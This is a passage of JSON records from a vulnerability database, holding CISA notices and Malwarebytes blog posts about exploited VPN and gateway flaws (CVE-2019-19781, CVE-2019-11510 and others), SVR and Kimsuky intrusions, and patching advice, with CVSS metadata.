"3.1"}, "impactScore": 6.0}, "published": "2021-04-15T00:00:00", "type": "cisa", "title": "NSA-CISA-FBI Joint Advisory on Russian SVR Targeting U.S. and Allied Networks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-09-28T00:00:00", "id": "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/04/15/nsa-cisa-fbi-joint-advisory-russian-svr-targeting-us-and-allied", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:54", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has released a [utility](<https://github.com/cisagov/check-cve-2019-19781>) that enables users and administrators to test whether their Citrix Application Delivery Controller (ADC) and Citrix Gateway software is susceptible to the CVE-2019-19781 vulnerability. According to Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>), beginning on January 20, 2020, Citrix will be releasing new versions of Citrix ADC and Citrix Gateway that will patch CVE-2019-19781.\n\nCISA strongly advises affected organizations to review CERT/CC\u2019s Vulnerability Note [VU#619785](<https://www.kb.cert.org/vuls/id/619785/>) and Citrix Security Bulletin [CTX267027 ](<https://support.citrix.com/article/CTX267027>)and apply the mitigations until Citrix releases new versions of the software.\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-13T00:00:00", "type": "cisa", "title": "CISA Releases Test for Citrix ADC and Gateway Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-13T00:00:00", "id": "CISA:661993843C9F9A838ADA8B8B8B9412D1", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/13/cisa-releases-test-citrix-adc-and-gateway-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:50", "description": "Citrix has released security updates to address the CVE-2019-19781 vulnerability in Citrix SD-WAN WANOP. An attacker could exploit this vulnerability to take control of an affected system. Citrix has also released an Indicators of Compromise Scanner that aims to identify evidence of successful exploitation of CVE-2019-19781.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) strongly recommends users and administrators review the Citrix Security Bulletin [CTX267027](<https://support.citrix.com/article/CTX267027>) and apply the necessary updates. CISA also recommends users and administrators:\n\n * Run the [Indicators of Compromise Scanner](<https://www.citrix.com/blogs/2020/01/22/citrix-and-fireeye-mandiant-share-forensic-tool-for-cve-2019-19781/>);\n * Review the Citrix article on [CVE-2019-19781: Fixes now available for Citrix SD-WAN WANOP](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>), published January 23, 2020; and\n * Review CISA\u2019s Activity Alert on [Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://www.us-cert.gov/ncas/alerts/aa20-020a>).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/23/citrix-releases-security-updates-sd-wan-wanop>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-23T00:00:00", "type": "cisa", "title": "Citrix Releases Security Updates for SD-WAN WANOP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-23T00:00:00", "id": "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/23/citrix-releases-security-updates-sd-wan-wanop", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-24T18:06:51", "description": "Citrix has released an article with updates on CVE-2019-19781, a vulnerability affecting Citrix Application Delivery Controller (ADC) and Citrix Gateway. This vulnerability also affects Citrix SD-WAN WANOP product versions 10.2.6 and version 11.0.3. The article includes updated mitigations for Citrix ADC and Citrix Gateway Release 12.1 build 50.28. An attacker could exploit CVE-2019-19781 to take control of an affected system. Citrix plans to begin releasing security updates for affected software starting January 20, 2020.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) recommends users and administrators:\n\n * Review the Citrix article on [updates on Citrix ADC, Citrix Gateway vulnerability](<https://www.citrix.com/blogs/2020/01/17/citrix-updates-on-citrix-adc-citrix-gateway-vulnerability/>), published January 17, 2020;\n * See Citrix Security Bulletin [CTX267027 \u2013 Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance](<https://support.citrix.com/article/CTX267027>);\n * Apply the recommended mitigations in [CTX267679 \u2013 Mitigation Steps for CVE-2019-19781](<https://support.citrix.com/article/CTX267679>); and\n * Verify the successful application of the above mitigations by using the tool in [CTX269180 \u2013 CVE-2019-19781 \u2013 Verification ToolTest](<https://support.citrix.com/article/CTX269180>).\n\nThis product is provided subject to this Notification and this [Privacy &amp; Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-17T00:00:00", "type": "cisa", "title": "Citrix Adds SD-WAN WANOP, Updated Mitigations to CVE-2019-19781 Advisory", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-17T00:00:00", "id": "CISA:134C272F26FB005321448C648224EB02", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/01/17/citrix-adds-sd-wan-wanop-updated-mitigations-cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-06-21T14:31:54", "description": "Remember when we told you to patch your VPNs already? I hate to say &quot;I told you so&quot;, but I informed you thusly.\n\nAccording to South Korean officials a North Korean cyber-espionage group managed to infiltrate the network of South Korea&#x27;s state-run nuclear research institute last month.\n\n### The crime: time and place\n\nCybersecurity news hounds The Record report that a spokesperson for the Korea Atomic Energy Research Institute (KAERI) said [the intrusion took place last month](<https://therecord.media/north-korean-hackers-breach-south-koreas-atomic-research-agency-through-vpn-bug/>), on May 14 to be exact, through a vulnerability in a virtual private network (VPN) server. Since its establishment in 1959, KAERI has been the only research institute in Korea dedicated to nuclear energy. Reportedly, thirteen unauthorized IP addresses accessed KAERI\u2019s internal network.\n\n### The suspect: Kimsuky\n\nSome of the addresses could be traced back to the APT group called Kimsuky. One of the IP addresses was used in an attack that targeted COVID-19 vaccine developers in South Korea last year.\n\nNorth Korean cyber-attacks on its southern neighbor are not uncommon. And Kimsuky is the APT that is best known for these attacks. The Kimsuky APT is a North Korean threat actor that has been active since 2012 and targets government entities mainly in South Korea. Recently, we reported about [this group using the AppleSeed backdoor](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) against the Ministry of Foreign Affairs of South Korea.\n\n### The victim: KAERI\n\nKAERI is a national research institute which was instrumental in developing nuclear technology for power generation and industrial applications. And while North Korea is ahead of South Korea in some nuclear fields\u2014notably nuclear weapons\u2014it is thought to be weaker than its neighbor when it comes to energy generation. As we stated in our earlier [report](<https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/>) one of the other targets was the nuclear security officer for the International Atomic Energy Agency (IAEA), a UN organization tasked with nuclear regulations and cooperation.\n\n### The weapon: a VPN vulnerability\n\nIn a [statement](<https://translate.google.com/translate?sl=auto&tl=en&u=https://www.kaeri.re.kr/board/view?menuId%3DMENU00326%26linkId%3D9181>), KAERI says that an unidentified outsider accessed parts of its system using weaknesses in its virtual private network (VPN). It also states that the attackers&#x27; IP addresses was blocked, and its system upgraded, when it found out about the attack, on May 31. \n\nThe name of the VPN vendor is being kept secret. Although we can&#x27;t rule out a zero-day, that fact that this wasn&#x27;t mentioned, and that the system was updated in response, suggests it wasn&#x27;t. It certainly doesn&#x27;t need to be, and there are a lot of known vulnerabilities in the running. Many of them are years old, and many are known to be used in the wild. Even though patches are available, the application of these patches has taken some organizations quite some time. \n\nWe also wrote recently about vulnerabilities in the [Pulse Secure VPN](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>). Pulse issued a final patch on May 3 for a set of vulnerabilities that were used in the wild.\n\nThe NSA also issued an [advisory](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/>) in April about five publicly known vulnerabilities being exploited by the Russian Foreign Intelligence Service (SVR). The CVE numbers used to identify vulnerabilities start with year the CVE was issued. What&#x27;s most striking about the NSA&#x27;s list is just how old most of the vulnerabilities on it are.\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) Fortinet FortiGate VPN\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) Synacor Zimbra Collaboration Suite\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) Pulse Secure Pulse Connect Secure VPN\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) Citrix Application Delivery Controller and Gateway\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) VMware Workspace ONE Access\n\nAs you can see, most of them are VPNs and other networking-related applications. By design a VPN is remotely accessible, which makes it a target that attackers can reach from anywhere. A VPN or gateway is always a likely target, especially if it has a known vulnerability. And a seasoned APT group, like Kimsuky, will have fewer problems reverse-engineering patches than your everyday cybercriminal.\n\n### Patching or lack thereof\n\nThe risky strategy of little-to-no-patching stands a good chance of going horribly wrong. A [Forbes study](<https://www.forbes.com/sites/taylorarmerding/2019/06/06/report-if-you-dont-patch-you-will-pay>) of 340 security professionals in 2019 found 27% of organizations worldwide, and 34% in Europe, said they\u2019d experienced breaches due to unpatched vulnerabilities. If an inability to patch promptly is compounded by delays in detecting new systems added to networks, and a lack of regular vulnerability scanning, attackers are left with a lot of room to work with.\n\nStay safe, everyone!\n\nThe post [Atomic research institute breached via VPN vulnerability](<https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-06-21T13:53:03", "type": "malwarebytes", "title": "Atomic research institute breached via VPN vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-06-21T13:53:03", "id": "MALWAREBYTES:BAB94968DD1EC37DA6F977226977DAF5", "href": "https://blog.malwarebytes.com/reports/2021/06/atomic-research-institute-breached-via-vpn-vulnerability/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T16:30:59", "description": "The National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have jointly released a Cybersecurity Advisory called [Russian SVR Targets U.S. and Allied Networks](<https://media.defense.gov/2021/Apr/15/2002621240/-1/-1/0/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF/CSA_SVR_TARGETS_US_ALLIES_UOO13234021.PDF>), to expose ongoing Russian Foreign Intelligence Service (SVR) exploitation of five publicly known vulnerabilities. The advisories&#x27; executive summary reads:\n\n> Russian Foreign Intelligence Service (SVR) actors, who are also known under the names APT29, Cozy Bear, and The Dukes frequently use publicly known vulnerabilities to conduct widespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials and use those to gain further access. This targeting and exploitation encompasses US and allied networks, including national security and government related systems.\n\n### Remarkable mentions in the cybersecurity advisory\n\nReleased alongside the advisory is the US Government\u2019s formal attribution of the [SolarWinds](<https://blog.malwarebytes.com/threat-analysis/2020/12/advanced-cyber-attack-hits-private-and-public-sector-via-supply-chain-software-update/>) supply chain compromise, and the cyber espionage campaign related to it, to Russia.\n\nMentioned are recent SVR activities that include targeting COVID-19 research facilities via [WellMess malware](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c>) and targeting networks through a VMware vulnerability disclosed by NSA.\n\n### Vulnerabilities\n\nNSA, CISA, and the FBI are encouraging organizations to check their networks for Indicators of Compromise (IOCs) related to five vulnerabilities.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThe advisory lists the following CVEs:\n\n * [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) as discussed here: [Fortinet FortiGate VPN](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [CVE-2019-9670](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9670>) as discussed here: [Synacor Zimbra Collaboration Suite](<https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories>)\n * [CVE-2019-11510](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510>) as discussed here: [Pulse Secure Pulse Connect Secure VPN](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>)\n * [CVE-2019-19781](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19781>) as discussed here: [Citrix Application Delivery Controller and Gateway](<https://support.citrix.com/article/CTX267027>)\n * [CVE-2020-4006](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-4006>) as discussed here: [VMware Workspace ONE Access](<https://www.vmware.com/security/advisories/VMSA-2020-0027.html>)\n\nWe have added a link to the vendor\u2019s sites where they discuss the vulnerabilities and where you can find how to patch them. As you can see most of those are quite old (the first four digits in a CVE ID are the year in which the CVE was issued) and patches have been available for a considerable time.\n\n### General mitigation strategy\n\nWhile some vulnerabilities have specific additional mitigations that you can read about in the items linked in the list above, the advisory hands us the following general mitigations:\n\n * Keep systems and products updated and patch as soon as possible after patches are released since many actors exploit numerous vulnerabilities.\n * Expect that the risk from data stolen or modified (including credentials, accounts, and software) before a device was patched will not be alleviated by patching or simple remediation actions. Assume that a breach will happen, enforce least-privileged access, and make password changes and account reviews a regular practice.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in device configurations.\n * Isolate Internet-facing services in a network Demilitarized Zone (DMZ) to reduce exposure of the internal network.\n * Enable robust logging of Internet-facing services and authentication functions. Continuously hunt for signs of compromise or credential misuse, particularly within cloud environments.\n * Adopt a mindset that compromise happens; prepare for incident response activities, only communicate about breaches on out-of-band channels, and take care to uncover a breach\u2019s full scope before remediating.\n\n### Techniques\n\nThe techniques leveraged by SVR actors include:\n\n * **Exploiting public-facing applications**. Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior.\n * **Leveraging external remote services**. Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms (notably RPD) allow users to connect to internal enterprise network resources from external locations.\n * **Compromising supply chains**. Adversaries may manipulate products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise.\n * **Using valid accounts**. Adversaries may obtain and abuse credentials of existing accounts as a means of gaining access or elevating permissions.\n * **Exploiting software for credential access**. Adversaries may exploit software vulnerabilities in an attempt to collect credentials.\n * **Forging web credentials**: SAML tokens. An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.\n\nThe items listed under mitigations and techniques probably won&#x27;t be new to many of the people reading this, but they are a reminder that security, even against nation-state actors, is often a matter of getting some important but mundane things right, over and over again.\n\nStay safe, everyone!\n\nThe post [Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.1, "privilegesRequired": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-16T14:59:38", "type": "malwarebytes", "title": "Patch now! NSA, CISA, and FBI warn of Russian intelligence exploiting 5 vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T14:59:38", "id": "MALWAREBYTES:80B21E934B1C43C7071F039FE9512208", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-10-18T17:31:38", "description": "In April 2019, Pulse Secure published an advisory about a vulnerability in their software. In August, cybercriminals were massively scanning for systems that were running a vulnerable version. Now it\u2019s October, and still many organizations have not applied the patches that are available for this vulnerability. \n\nThis is a trend we've seen repeated with dozens of other publicly-known vulnerabilities and organizations that are slow to update software to the latest, most secure versions. \n\nWith so many organizations falling victim to cyberattack via exploited vulnerability, we have to ask: Why aren't people patching?\n\n### What are the vulnerabilities?\n\nReading the above, you might suspect that the vulnerabilities were not serious or hard to exploit. But that's not the impression we get from the Pulse Secure advisory. It states:\n\n> \u201cMultiple vulnerabilities were discovered and have been resolved in Pulse Connect Secure (PCS) and Pulse Policy Secure (PPS). This includes an authentication by-pass vulnerability that can allow an unauthenticated user to perform a remote arbitrary file access on the Pulse Connect Secure gateway. This advisory also includes a remote code execution vulnerability that can allow an authenticated administrator to perform remote code execution on Pulse Connect Secure and Pulse Policy Secure gateways.\u201d\n\nPulse Connect Secure is a VPN solution for organizations and offers remote users a secure connection to the corporate network so they can remotely log in and work. Pulse Policy Secure is a well-known Network Access Control solution, which does not only control who can connect but also assigns the appropriate permissions.\n\nWhen it comes to software like this, an authentication by-pass vulnerability is a serious problem. Any criminal with the proper knowledge can pretend to be an employee and access company resources. In this case, https access and the use of an especially-prepared URL would be enough to read an arbitrary file on a vulnerable system.\n\nNeedless to say, that is a serious problem\u2014and we haven\u2019t even touched on the remote code execution possibility. Every hacker's dream is to be able to run their code on your system. That gives them a foothold within your network from which they can expand their activities. They can plant ransomware or whatever else they fancy.\n\n### Where would they get the necessary knowledge\n\nBy design, many cybercriminals are opportunistic, and they will jump at any easy copy-and-paste job that renders enough cash. So, when the vulnerability was discussed elaborately at Black Hat in early August, the method to exploit the vulnerability became general knowledge. \n\nSince using this method hardly requires expert knowledge, researchers soon noticed a lot of scanning activity by cybercriminals looking for vulnerable systems. The vulnerability in Pulse Secure was presented along with a [few vulnerabilities in other SSL VPN products](<https://www.blackhat.com/us-19/briefings/schedule/#infiltrating-corporate-intranet-like-nsa---pre-auth-rce-on-leading-ssl-vpns-15545>). Shortly after, an exploit for this vulnerability was published on GitHub, so every copycat could have it handy.\n\n### Unpatched\n\nOn Saturday, August 24, 2019, scans performed by [Bad Packets](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) found a total of 14,528 Pulse Secure VPN endpoints vulnerable to CVE-2019-11510. Over 5,000 of those were in the US, including military, federal, state, and local government agencies. \n\nA week later, 10,471 Pulse Secure VPN servers worldwide remained vulnerable to compromise. On Monday, September 16, 2019, there were still 7,712 left to be patched. On Monday, October 7, 2019, a surprising 6,018 remained, with a lot of active scanning going on\u2014and this was after advisories have been issued by the NSA and the NCSC.\n\n### Responsibility\n\nA basic question in cases like these is: Who is responsible for applying patches? Without doubt, we expect a vendor to develop a patch as soon as the vulnerability is made known to them, but what happens after that? \n\nIndustry leaders have long warned that vulnerability remediation and effective patch management are essential to keep organizations safe from cyberattacks. But there are a few essential steps in the delivery chain after the patch is released:\n\n * Customers need to be made aware of the patch and the required urgency.\n * Security providers or resellers need to make sure their customers are aware of the existence of the patch and the possible consequences of not applying it.\n * Organizations need to have a department or external provider that is responsible for keeping the security software updated. Spending money on top-notch software and then leaving it unattended is a sure waste of money. Keeping software in shape is not limited to applying patches, but security patches can sometimes be more important than fetching the latest rules update.\n\nThe natural next question, then, is why aren't organizations applying patches as soon as they know about them? \n\n* * *\n\n_Recommended reading: _[Tackling the shortage in skilled IT staff: whole team security](<https://blog.malwarebytes.com/security-world/business-security-world/2019/02/tackling-the-shortage-in-skilled-it-staff-whole-team-security/>)\n\n* * *\n\n### So, what\u2019s stopping them from applying the patch?\n\nAssuming that an organization's IT or security team is aware of the patch, possible reasons for holding off might be fear of disrupted processes or a possible disagreement on what they might regard as critical. But the possible consequences of an unpatched critical vulnerability should heavily outweigh those concerns. \n\nThere could be several other reasons for not applying patches as soon as they are available:\n\n * Understaffed IT and security teams \n * Looking into the consequences first, which could slow down the process due to lack of feedback\n * Waiting for others to share their experiences before applying patches \n * Unaware of the patch's existence, sometimes as a result of not having time to follow up on emails and warning signs\n * Lack of a point of contact. Whose problem is it? And whose job is to solve it?\n\nAs you can see, most of these can be traced back to a lack of staff and time, and sometimes funding is responsible for those two shortages. But sometimes understaffing is because of [other reasons.](<https://blog.malwarebytes.com/security-world/2018/06/whats-causing-the-cybersecurity-skills-gap/>) And once you are understaffed, the lack of time to follow up on problems comes as a logical consequence.\n\n### The Pulse vulnerability is not alone\n\nIt\u2019s not like the Pulse vulnerability is the only VPN-related vulnerability out there (or any software vulnerability, for that matter). Similar problems are known to exist in products from Fortinet and Palo Alto. \n\nIn an [advisory](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>) from the National Cyber Security Center (NCSC) in the UK, users of the affected VPN products can find specified log entries to look for signs of a compromise or attempt to compromise. They also emphasize the need for patching: \n\n> \u201cSecurity patches should always be applied promptly. More guidance is available on the NCSC website. The NCSC acknowledges that patching is not always straightforward and in some cases can cause business disruption, but it remains the single most important step an organisation or individual can take to protect itself.\u201d\n\nSo, the question remains: If organizations are aware of the patch and have the staff resources to apply it, why are so many dragging their feet? Maybe some of our readers can shed some light on this mystery. Feel free to share your personal experiences in the comments. \n\nThe post [Pulse VPN patched their vulnerability, but businesses are trailing behind](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-10-18T16:36:36", "type": "malwarebytes", "title": "Pulse VPN patched their vulnerability, but businesses are trailing behind", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": 